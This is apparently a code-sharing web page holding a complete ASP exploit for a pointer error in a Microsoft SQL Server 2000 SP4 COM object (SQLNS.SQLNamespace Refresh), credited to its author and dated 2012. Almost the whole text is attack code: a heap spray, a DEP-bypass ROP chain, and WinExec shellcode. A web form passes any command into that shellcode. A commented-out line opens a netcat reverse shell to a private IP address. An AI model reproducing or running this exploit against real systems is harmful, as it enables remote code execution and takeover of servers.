扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
<% Function Padding(intLen) Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape("%u4141") Next Padding = strRet End Function Function PackDWORD(strPoint) strTmp = replace(strPoint, "0x", "") PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2)) PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2)) End Function Function PackList(arrList) For Each Item In arrList PackList = PackList & PackDWORD(Item) Next End Function Function PackShellcode(strCode) intLen = Len(strCode) / 4 If intLen Mod 2 = 1 Then strCode = strCode & "\x90" intLen = intLen + 1 End If arrTmp = Split(strCode, "\x") For I = 1 To UBound(arrTmp) Step 2 PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I)) Next End Function Function UnicodeToAscii(uStrIn) intLen = Len(strCommand) If intLen Mod 2 = 1 Then For I = 1 To intLen - 1 Step 2 UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1))) Next UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1))) Else For I = 1 To intLen - 1 Step 2 UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1))) Next End If UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000") End Function '''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes Rop_Chain = Array(_ "0x41414141", _ "0x7c373ab6", _ "0x7c3425bc", _ "0x7c376fc5", _ "0x7c343423", _ "0x7c3415a2", _ "0x7c373ab6", _ "0x41414141", _ "0x41414141", _ "0x41414141", _ "0x41414141", _ "0x7c344dbe", _ "0x7c376fc5", _ "0x7c373ab6", _ "0x7c373ab6", _ "0x7c351cc5", _ "0x7c3912a3", _ "0x7c3427e5", _ "0x7c346c0b", _ "0x7c3590be", _ "0x7c37a151", _ "0x7c378c81", _ "0x7c345c30"_ ) Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90" '0C0C0C6C 64:8B25 00000000MOV ESP,DWORD PTR FS:[0] '0C0C0C73 EB 07 JMP SHORT 0C0C0C7C '0C0C0C75 90NOP '0C0C0C76 90NOP '0C0C0C77 90NOP '12 bytes Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30" '0C0C0C7C 83EC 24 SUB ESP,24 '0C0C0C7F 8BECMOV EBP,ESP '0C0C0C81 83C5 30 ADD EBP,30 '8 bytes '''''''''''''''''''''''''''''shellcode WinExec (win2k sp2) Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3" 'D9EEFLDZ '9BWAIT 'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] '5EPOP ESI '83C6 1a ADD ESI,1a '33C0XOR EAX,EAX '50PUSH EAX '56PUSH ESI '68 F1F8807C PUSH kernel32.ExitThread '68 1641867C PUSH kernel32.WinExec 'C3RETN '''''''''''''''''''''''''''''main Dim strCmd strCmd = Request("cmd") strCommand = "cmd.exe /q /c " & strCmd 'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080" strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand) intOpcode = Len(strOpcode) Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_ PackShellcode(Fix_ESP) & strOpcode &_ Padding(928 - intOpcode*2) 'Response.Write Len(Payload) Dim Block For N = 1 to 512 Block = Block & Payload Next Dim spary() For I = 0 To 200 Step 1 Redim Preserve spary(I) spary(I) = Block Next If strCmd = "" Then Response.Write "Please Input command! <br />" Else Set obj = CreateObject("SQLNS.SQLNamespace") Response.Write "Try to Execute: " & strCommand arg1 = 202116108 '0x0c0c0c0c obj.Refresh arg1 End If %> <html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title> <body> <p> Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br /> Other version not test :) <br /> Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br /> </P> <form action="" method="post"> Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit"> </form> </form> |
体验盒子
